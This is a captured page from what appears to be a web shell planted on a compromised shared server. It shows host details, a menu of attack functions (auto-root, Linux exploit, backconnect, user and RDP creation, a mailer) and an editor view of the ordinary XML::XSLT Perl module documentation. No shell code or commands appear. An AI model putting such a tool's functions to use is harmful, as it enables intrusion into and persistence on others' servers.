Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml-xslt-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
91-22-5.cml
448
B
-rw-r--r--
91-22-5.cml.xml
448
B
-rw-r--r--
91-22-5.xml
602
B
-rw-r--r--
95-48-7.xml
181
B
-rw-r--r--
95-48-7.xsl
879
B
-rw-r--r--
REC-xml-19980210.xml.gz
44.06
KB
-rw-r--r--
REC-xslt-19991116.xml.gz
54.84
KB
-rw-r--r--
XSLT.html
16.9
KB
-rw-r--r--
XSLT.xml.gz
3.69
KB
-rw-r--r--
XSLT.xsl
1.28
KB
-rw-r--r--
agenda.dtd
1.31
KB
-rw-r--r--
agenda.html
104.98
KB
-rw-r--r--
agenda.xml.gz
5.41
KB
-rw-r--r--
agenda.xsl
3.75
KB
-rw-r--r--
bernhard.xml
419
B
-rw-r--r--
bernhard.xsl
390
B
-rw-r--r--
cml.xsl
1.06
KB
-rw-r--r--
cml2cml.xsl
1.73
KB
-rw-r--r--
grammar.xml.gz
44.06
KB
-rw-r--r--
grammar.xsl
780
B
-rw-r--r--
grammar2.xml.gz
44.06
KB
-rw-r--r--
grammar2.xsl
1.31
KB
-rw-r--r--
identity.xml
2.01
KB
-rw-r--r--
identity.xsl
306
B
-rw-r--r--
identity.xsl_org
334
B
-rw-r--r--
test.dtd
997
B
-rw-r--r--
test.xml
2.01
KB
-rw-r--r--
test.xsl
3.83
KB
-rw-r--r--
test2.xml
2.01
KB
-rw-r--r--
test2.xsl.gz
956
B
-rw-r--r--
xmlspec.xsl.gz
3.4
KB
-rw-r--r--
xpath.xsl
1.73
KB
-rw-r--r--
xslt-parser
2.15
KB
-rwxr-xr-x
xslt.xsl
3.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : XSLT.html
Content-Type: text/xml Content-Length: 17259 <?xml version="1.0" encoding="UTF-8"?> <html xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="xslt.css" /><title>XML::XSLT - A perl module for processing XSLT </title></head><body> <h1>NAME</h1>XML::XSLT - A perl module for processing XSLT <h1>SYNOPSIS </h1> <pre> use XML::XSLT; my $xslt = XML::XSLT->new ($xsl, warnings => 1); $xslt->transform ($xmlfile); print $xslt->toString; $xslt->dispose(); </pre> <h1>DESCRIPTION </h1> <p> This module implements the W3C's XSLT specification. The goal is full implementation of this spec, but we have not yet achieved that. However, it already works well. See XML::XSLT Commands for the current status of each command. </p> <p> XML::XSLT makes use of XML::DOM and LWP::Simple, while XML::DOM uses XML::Parser. Therefore XML::Parser, XML::DOM and LWP::Simple have to be installed properly for XML::XSLT to run. </p> <h1>Specifying Sources </h1> <p> The stylesheets and the documents may be passed as filenames, file handles regular strings, string references or DOM-trees. Functions that require sources (e.g. new), will accept either a named parameter or simply the argument. </p> <p> Either of the following are allowed: </p> <pre> my $xslt = XML::XSLT->new($xsl); my $xslt = XML::XSLT->new(Source => $xsl); </pre> <p> In documentation, the named parameter `Source' is always shown, but it is never required. </p> <h2>METHODS </h2> <ul> <li> <b>new(Source => $xml [, %args]) </b> <p> Returns a new XSLT parser object. Valid flags are: </p> </li> <ul> <li> <b>DOMparser_args </b> <p> Hashref of arguments to pass to the XML::DOM::Parser object's parse method. </p> </li> <li> <b>variables </b> <p> Hashref of variables and their values for the stylesheet. </p> </li> <li> <b>base </b> <p> Base of URL for file inclusion. </p> </li> <li> <b>debug </b> <p> Turn on debugging messages. </p> </li> <li> <b>warnings </b> <p> Turn on warning messages. </p> </li> <li> <b>indent </b> <p> Starting amount of indention for debug messages. Defaults to 0. </p> </li> <li> <b>indent_incr </b> <p> Amount to indent each level of debug message. Defaults to 1. </p> </li> </ul> <li> <b>open_xml(Source => $xml [, %args]) </b> <p> Gives the XSLT object new XML to process. Returns an XML::DOM object corresponding to the XML. </p> </li> <ul> <li> <b>base </b> <p> The base URL to use for opening documents. </p> </li> <li> <b>parser_args </b> <p> Arguments to pase to the parser. </p> </li> </ul> <li> <b>open_xsl(Source => $xml, [, %args]) </b> <p> Gives the XSLT object a new stylesheet to use in processing XML. Returns an XML::DOM object corresponding to the stylesheet. Any arguments present are passed to the XML::DOM::Parser. </p> </li> <ul> <li> <b>base </b> <p> The base URL to use for opening documents. </p> </li> <li> <b>parser_args </b> <p> Arguments to pase to the parser. </p> </li> </ul> <li> <b>process(%variables) </b> <p> Processes the previously loaded XML through the stylesheet using the variables set in the argument. </p> </li> <li> <b>transform(Source => $xml [, %args]) </b> <p> Processes the given XML through the stylesheet. Returns an XML::DOM object corresponding to the transformed XML. Any arguments present are passed to the XML::DOM::Parser. </p> </li> <li> <b>serve(Source => $xml [, %args]) </b> <p> Processes the given XML through the stylesheet. Returns a string containg the result. Example: </p> <pre> use XML::XSLT qw(serve); </pre> <pre> $xslt = XML::XSLT->new($xsl); print $xslt->serve $xml; </pre> </li> <ul> <li> <b>http_headers </b> <p> If true, then prepends the appropriate HTTP headers (e.g. Content-Type, Content-Length); </p> <p> Defaults to true. </p> </li> <li> <b>xml_declaration </b> <p> If true, then the result contains the appropriate <?xml?> header. </p> <p> Defaults to true. </p> </li> <li> <b>xml_version </b> <p> The version of the XML. </p> <p> Defaults to 1.0. </p> </li> <li> <b>doctype </b> <p> The type of DOCTYPE this document is. Defaults to SYSTEM. </p> </li> </ul> <li> <b>toString </b> <p> Returns the result of transforming the XML with the stylesheet as a string. </p> </li> <li> <b>to_dom </b> <p> Returns the result of transforming the XML with the stylesheet as an XML::DOM object. </p> </li> <li> <b>media_type </b> <p> Returns the media type (aka mime type) of the object. </p> </li> <li> <b>dispose </b> <p> Executes the dispose method on each XML::DOM object. </p> </li> </ul> <h1>XML::XSLT Commands </h1> <ul> <li> <b>xsl:apply-imports no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:apply-templates limited </b> <p> Attribute 'select' is supported to the same extent as xsl:value-of supports path selections. </p> <p> Not supported yet: - attribute 'mode' - xsl:sort and xsl:with-param in content </p> </li> <li> <b>xsl:attribute partially </b> <p> Adds an attribute named to the value of the attribute 'name' and as value the stringified content-template. </p> <p> Not supported yet: - attribute 'namespace' </p> </li> <li> <b>xsl:attribute-set yes </b> <p> Partially </p> </li> <li> <b>xsl:call-template yes </b> <p> Takes attribute 'name' which selects xsl:template's by name. </p> <p> Weak support: - xsl:with-param (select attrib not supported) </p> <p> Not supported yet: - xsl:sort </p> </li> <li> <b>xsl:choose yes </b> <p> Tests sequentially all xsl:whens until one succeeds or until an xsl:otherwise is found. Limited test support, see xsl:when </p> </li> <li> <b>xsl:comment yes </b> <p> Supported. </p> </li> <li> <b>xsl:copy partially </b> </li> <li> <b>xsl:copy-of limited </b> <p> Attribute 'select' functions as well as with xsl:value-of </p> </li> <li> <b>xsl:decimal-format no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:element yes </b> </li> <li> <b>xsl:fallback no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:for-each limited </b> <p> Attribute 'select' functions as well as with xsl:value-of </p> <p> Not supported yet: - xsl:sort in content </p> </li> <li> <b>xsl:if limited </b> <p> Identical to xsl:when, but outside xsl:choose context. </p> </li> <li> <b>xsl:import no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:include yes </b> <p> Takes attribute href, which can be relative-local, absolute-local as well as an URL (preceded by identifier http:). </p> </li> <li> <b>xsl:key no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:message no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:namespace-alias no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:number no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:otherwise yes </b> <p> Supported. </p> </li> <li> <b>xsl:output limited </b> <p> Only the initial xsl:output element is used. The "text" output method is not supported, but shouldn't be difficult to implement. Only the "doctype-public", "doctype-system", "omit-xml-declaration", "method", and "encoding" attributes have any support. </p> </li> <li> <b>xsl:param experimental </b> <p> Synonym for xsl:variable (currently). See xsl:variable for support. </p> </li> <li> <b>xsl:preserve-space no </b> <p> Not supported yet. Whitespace is always preserved. </p> </li> <li> <b>xsl:processing-instruction yes </b> <p> Supported. </p> </li> <li> <b>xsl:sort no </b> <p> Not supported yet. </p> </li> <li> <b>xsl:strip-space no </b> <p> Not supported yet. No whitespace is stripped. </p> </li> <li> <b>xsl:stylesheet limited </b> <p> Minor namespace support: other namespace than 'xsl:' for xsl-commands is allowed if xmlns-attribute is present. xmlns URL is verified. Other attributes are ignored. </p> </li> <li> <b>xsl:template limited </b> <p> Attribute 'name' and 'match' are supported to minor extend. ('name' must match exactly and 'match' must match with full path or no path) </p> <p> Not supported yet: - attributes 'priority' and 'mode' </p> </li> <li> <b>xsl:text yes </b> <p> Supported. </p> </li> <li> <b>xsl:transform limited </b> <p> Synonym for xsl:stylesheet </p> </li> <li> <b>xsl:value-of limited </b> <p> Inserts attribute or element values. Limited support: </p> <p> <xsl:value-of select="."/> </p> <p> <xsl:value-of select="/root-elem"/> </p> <p> <xsl:value-of select="elem"/> </p> <p> <xsl:value-of select="//elem"/> </p> <p> <xsl:value-of select="elem[n]"/> </p> <p> <xsl:value-of select="//elem[n]"/> </p> <p> <xsl:value-of select="@attr"/> </p> <p> <xsl:value-of select="text()"/> </p> <p> <xsl:value-of select="processing-instruction()"/> </p> <p> <xsl:value-of select="comment()"/> </p> <p> and combinations of these. </p> <p> Not supported yet: - attribute 'disable-output-escaping' </p> </li> <li> <b>xsl:variable experimental </b> <p> Very limited. It should be possible to define a variable and use it with &lt;xsl:value select="$varname" /&gt; within the same template. </p> </li> <li> <b>xsl:when limited </b> <p> Only inside xsl:choose. Limited test support: </p> <p> <xsl:when test="@attr='value'"> </p> <p> <xsl:when test="elem='value'"> </p> <p> <xsl:when test="path/[@attr='value']"> </p> <p> <xsl:when test="path/[elem='value']"> </p> <p> <xsl:when test="path"> </p> <p> path is supported to the same extend as with xsl:value-of </p> </li> <li> <b>xsl:with-param experimental </b> <p> It is currently not functioning. (or is it?) </p> </li> </ul> <h1>SUPPORT </h1> <p> General information, bug reporting tools, the latest version, mailing lists, etc. can be found at the XML::XSLT homepage: </p> <pre> http://xmlxslt.sourceforge.net/ </pre> <h1>DEPRECATIONS </h1> <p> Methods and interfaces from previous versions that are not documented in this version are deprecated. Each of these deprecations can still be used but will produce a warning when the deprecation is first used. You can use the old interfaces without warnings by passing new() the flag use_deprecated . Example: </p> <pre> $parser = XML::XSLT->new($xsl, "FILE", use_deprecated => 1); </pre> <p> The deprecated methods will disappear by the time a 1.0 release is made. </p> <p> The deprecated methods are : </p> <ul> <li> <b>output_string </b> <p> use toString instead </p> </li> <li> <b>result_string </b> <p> use toString instead </p> </li> <li> <b>output </b> <p> use toString instead </p> </li> <li> <b>result </b> <p> use toString instead </p> </li> <li> <b>result_mime_type </b> <p> use media_type instead </p> </li> <li> <b>output_mime_type </b> <p> use media_type instead </p> </li> <li> <b>result_tree </b> <p> use to_dom instead </p> </li> <li> <b>output_tree </b> <p> use to_dom instead </p> </li> <li> <b>transform_document </b> <p> use transform instead </p> </li> <li> <b>process_project </b> <p> use process instead </p> </li> <li> <b>open_project </b> <p> use Source argument to new() and transform instead. </p> </li> <li> <b>print_output </b> <p> use serve() instead. </p> </li> </ul> <h1>BUGS </h1> <p> Yes. </p> <h1>HISTORY </h1> <p> Geert Josten and Egon Willighagen developed and maintained XML::XSLT up to version 0.22. At that point, Mark Hershberger started moving the project to Sourceforge and began working on it with Bron Gondwana. </p> <h1>LICENCE </h1> <p> Copyright (c) 1999 Geert Josten & Egon Willighagen. All Rights Reserverd. This module is free software, and may be distributed under the same terms and conditions as Perl. </p> <h1>AUTHORS </h1> <p> Geert Josten <gjosten@sci.kun.nl> </p> <p> Egon Willighagen <egonw@sci.kun.nl> </p> <p> Mark A. Hershberger <mah@everybody.org> </p> <p> Bron Gondwana <perlcode@brong.net> </p> <p> Jonathan Stowe <jns@gellyfish.com> </p> <h1>SEE ALSO </h1> <p> XML::DOM , LWP::Simple , XML::Parser </p> </body></html>
Close